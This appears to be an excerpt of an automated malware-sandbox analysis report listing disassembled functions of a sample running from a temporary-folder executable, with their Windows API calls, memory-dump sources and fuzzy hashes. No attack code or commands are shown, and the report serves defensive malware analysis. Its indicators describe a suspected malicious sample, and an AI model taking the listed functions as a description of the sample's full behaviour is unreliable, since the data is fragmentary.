                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0739f85a4d911baae0561c1f2f5b651aa469f8b70ac1dc09fd50f765aaaafbc7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 64D1F473B18E81C9E712DF65D4502AC7BB1FB447A8B944236CE5E57B99DE38E80AC310
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7102DC25B), ref: 00007FF7102DC38C
                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7102DC25B), ref: 00007FF7102DC417
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 953036326-0
                                                                                                                                                                                                  • Opcode ID: 76adbd728b317254a89cb4c791728419eb9f151af89ead0c9a06842c56e3605f
                                                                                                                                                                                                  • Instruction ID: 6582c0e9de946f9534ec54c12df7264c8b9fbfe730ba3644157abcde8752bdc7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 76adbd728b317254a89cb4c791728419eb9f151af89ead0c9a06842c56e3605f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2291C873F08A5685F750EF65945027DAFA0BB04BA8FA44139DE0E67B84DE38F8498720
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FFEEE263CC2,?,?,?,?,00007FFEEE214EB5,?,?,?,00007FFEEE1DADB6,?,?,?), ref: 00007FFEEE263B7A
                                                                                                                                                                                                  • FlushFileBuffers.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FFEEE263CC2,?,?,?,?,00007FFEEE214EB5,?,?,?,00007FFEEE1DADB6,?,?,?), ref: 00007FFEEE263BAB
                                                                                                                                                                                                    • Part of subcall function 00007FFEEE1DF850: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FFEEE1D7C74,?,?,?,00007FFEEE1D78F7,?,?,?,00007FFEEE1DAC33,?,?,?,00007FFEEE1DADB6), ref: 00007FFEEE1DF85A
                                                                                                                                                                                                    • Part of subcall function 00007FFEEE1DF850: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FFEEE1D7C74,?,?,?,00007FFEEE1D78F7,?,?,?,00007FFEEE1DAC33,?,?,?,00007FFEEE1DADB6), ref: 00007FFEEE1DF8A0
                                                                                                                                                                                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FFEEE263CC2,?,?,?,?,00007FFEEE214EB5,?,?,?,00007FFEEE1DADB6,?,?,?), ref: 00007FFEEE263BBF
                                                                                                                                                                                                  • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FFEEE263CC2,?,?,?,?,00007FFEEE214EB5,?,?,?,00007FFEEE1DADB6,?,?,?), ref: 00007FFEEE263BEE
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast$CriticalSection$BuffersEnterFileFlushLeave
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1312186065-0
                                                                                                                                                                                                  • Opcode ID: 4f2888ff7bbf60e021e831f350996abbc6d04b76299a57556fe12fb360717843
                                                                                                                                                                                                  • Instruction ID: 3af6d1af3d32dea44195d732adef7db25b25b8a73311b81a68539d21ae5e80dc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4f2888ff7bbf60e021e831f350996abbc6d04b76299a57556fe12fb360717843
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F219F72A24F8681DA10DF15F4942696361FB9CF85B464236DA8E47378DFBCE194C301
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1956198572-0
                                                                                                                                                                                                  • Opcode ID: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
                                                                                                                                                                                                  • Instruction ID: 3953781e4aba4275edbd6fd67cd3e73a19c388bef7d006d2f8485dae59620a51
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16110021E1894241F755A759F64527A9A51EF95BA0FC48032DE4D07B8ECD3DF4CD8520
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2933794660-0
                                                                                                                                                                                                  • Opcode ID: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
                                                                                                                                                                                                  • Instruction ID: 6ba6c3ac0b642c85072146fdca1b7b62a33fa72c31c3cb467e4fd2455bcc4bc1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 44117022B14F068AEB00DF60E8542B977A4FB59B68F840E35DE2D577A4DF7CE1988350
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00007FFEEE1D2FE0: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FFEEE232851), ref: 00007FFEEE1D2FEA
                                                                                                                                                                                                    • Part of subcall function 00007FFEEE1D2FE0: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FFEEE232851), ref: 00007FFEEE1D3030
                                                                                                                                                                                                  • GetACP.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,00000092,?,?,?,CCCCCCC338C48348,00007FFEEE1D013B), ref: 00007FFEEE1DCCC1
                                                                                                                                                                                                  • IsValidCodePage.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FFEEE1DCCDF
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast$CodePageValid
                                                                                                                                                                                                  • String ID: utf8
                                                                                                                                                                                                  • API String ID: 943130320-905460609
                                                                                                                                                                                                  • Opcode ID: 077269e3ce0ea29f6dee95bf8b04cfeeb839662aa7eba8c435895ef23497d673
                                                                                                                                                                                                  • Instruction ID: 3a2a37ca2a6a3a60afe3be460dc3c715898281ca62f9c39b0a87bddd633369d2
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 077269e3ce0ea29f6dee95bf8b04cfeeb839662aa7eba8c435895ef23497d673
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9919172B0864381EB649F21E4507BA2694AF88B85F474432DECD577E1EFBCE985C342
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _handle_error
                                                                                                                                                                                                  • String ID: !$fmod
                                                                                                                                                                                                  • API String ID: 1757819995-3213614193
                                                                                                                                                                                                  • Opcode ID: a5046bec0b170f6f65a4cdd1cb73adc953bca75b89e3650b120db442c54fc02e
                                                                                                                                                                                                  • Instruction ID: dcbdbd3f4b6c022ef8071e5361f620ef0ac256faac5262b9d8007c3405b55f9c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a5046bec0b170f6f65a4cdd1cb73adc953bca75b89e3650b120db442c54fc02e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0451B311C2DB858AE2635B71B0117B9B698AFE73C4F039333F99E315B1DBADA5834601
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID: ?
                                                                                                                                                                                                  • API String ID: 1286766494-1684325040
                                                                                                                                                                                                  • Opcode ID: 30789dec6190b383a199f118b84c25ff7dc7ec79571e837530472d1d90a39620
                                                                                                                                                                                                  • Instruction ID: e77e3916d363edac1704f1e1fe6974cc0d284bda638f8e80cde82d465aa19813
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 30789dec6190b383a199f118b84c25ff7dc7ec79571e837530472d1d90a39620
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B411612A18A8246FB64AB2594017BAEF50EF80BB4F944235EF5C16BD5DF3CF4858710
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7102D835E
                                                                                                                                                                                                    • Part of subcall function 00007FF7102D9C58: RtlFreeHeap.NTDLL(?,?,?,00007FF7102E2032,?,?,?,00007FF7102E206F,?,?,00000000,00007FF7102E2535,?,?,?,00007FF7102E2467), ref: 00007FF7102D9C6E
                                                                                                                                                                                                    • Part of subcall function 00007FF7102D9C58: GetLastError.KERNEL32(?,?,?,00007FF7102E2032,?,?,?,00007FF7102E206F,?,?,00000000,00007FF7102E2535,?,?,?,00007FF7102E2467), ref: 00007FF7102D9C78
                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7102CBEC5), ref: 00007FF7102D837C
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exe
                                                                                                                                                                                                  • API String ID: 3580290477-898561748
                                                                                                                                                                                                  • Opcode ID: b12c586edd81a32e618353e8c6e47471c9321224668f8732ac6121a92b7f4d59
                                                                                                                                                                                                  • Instruction ID: 09cd026aee755dcbd4866e7def9b75b03ef453d24cfc354720125d677764a895
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b12c586edd81a32e618353e8c6e47471c9321224668f8732ac6121a92b7f4d59
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 57417033A08F5285E754FF25A4810BCAB94FB45BA0BD54039EA4E43B85DF7CF8898320
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CurrentDirectory_invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID: .$:
                                                                                                                                                                                                  • API String ID: 2020911589-4202072812
                                                                                                                                                                                                  • Opcode ID: ad5c876629fe8078e18385c4f1b2da22d3a52b0bd0772cdaead257d22d6ab4fb
                                                                                                                                                                                                  • Instruction ID: 4b78896f81df8fe9737094e202c50a500f7e12d1f99938baea5639263dfe29d9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ad5c876629fe8078e18385c4f1b2da22d3a52b0bd0772cdaead257d22d6ab4fb
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DE414D23F08F5298FB51ABB198516FC6AB46F14768F940035DE4D67B89DF38F84A8324
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                                                                                  • String ID: U
                                                                                                                                                                                                  • API String ID: 442123175-4171548499
                                                                                                                                                                                                  • Opcode ID: 8a697203ccd77e4b09c13c65c1c26094ec0dd1f28ad5eedaecdf6916cad97550
                                                                                                                                                                                                  • Instruction ID: c021985af972cfd90e085281a32192e84863a5a3c0197a81d1e7eea70c2a591b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8a697203ccd77e4b09c13c65c1c26094ec0dd1f28ad5eedaecdf6916cad97550
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9141B423B18A85C5DB21AF25E8443AABB60FB987A4F904035EE4D87B98DF3CE445C710
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                                                                                  • String ID: U
                                                                                                                                                                                                  • API String ID: 442123175-4171548499
                                                                                                                                                                                                  • Opcode ID: 288c51f84b61f88815cb9e54d337bf8bb85fc5b2dcb5d4d5e2a986185ac6fdb6
                                                                                                                                                                                                  • Instruction ID: db5c38890f0e8348df984374d2fd22a3d6e05acd21a90bb90d4d974358ca851a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 288c51f84b61f88815cb9e54d337bf8bb85fc5b2dcb5d4d5e2a986185ac6fdb6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7941A2B2A19A8285EB609F25F4443B9B7A4FB98784F434131DE8D877A8DFBCD441C741
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: EntryInterlockedListNamePush__un
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 524438517-3916222277
                                                                                                                                                                                                  • Opcode ID: 47fe8399b7fe3f20832c88d3e99e3460415be596f92942b6acded4595a71f1d9
                                                                                                                                                                                                  • Instruction ID: 7f808c97f400e52046219fea3170523c73f86cba607de9a3f4d968ea10a2fa6b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 47fe8399b7fe3f20832c88d3e99e3460415be596f92942b6acded4595a71f1d9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8831E412A19B9240EB15DF26A4097792390BB4CFD4B5B4531EDAD033E8DE7DD842C341
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(?,?,?,?,00000000,?,00007FFEEE1C1718), ref: 00007FFEEE1C17A3
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                                                                  • String ID: EnumSystemLocalesEx$IsValidLocaleName
                                                                                                                                                                                                  • API String ID: 190572456-1098237698
                                                                                                                                                                                                  • Opcode ID: 01f6ff738e71fb6d052a19988c064d12b91bbc42d646210aa8682f63498baed6
                                                                                                                                                                                                  • Instruction ID: 4c79abb22e7c10613491e2452b279ff1577d4b6d4eec7e632726fca82c0d7e7f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 01f6ff738e71fb6d052a19988c064d12b91bbc42d646210aa8682f63498baed6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0531AE71B4974682FA149F14F81177563A1AB88790F434236DE9C477B8EFBCE484C742
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _handle_errorf
                                                                                                                                                                                                  • String ID: "$powf
                                                                                                                                                                                                  • API String ID: 2315412904-603753351
                                                                                                                                                                                                  • Opcode ID: 9c0c2074deed8049657b9258028c4a6d4fcf62c9ac615ca19d8b2c990d0ceb3c
                                                                                                                                                                                                  • Instruction ID: 8f5d6b91bda51fbf112c3327bf1620b8e41ba34e9247c1acdbdd3dc9a6556395
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9c0c2074deed8049657b9258028c4a6d4fcf62c9ac615ca19d8b2c990d0ceb3c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F74156B3D186819AD370CF62E4847AAB6A0FB99348F121327F789019B4CFBDC595DB41
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(?,?,?,00007FFEEE22D6DD,?,?,?,?,?,?,?,?,?,00007FFEEE22F22F), ref: 00007FFEEE22DF46
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
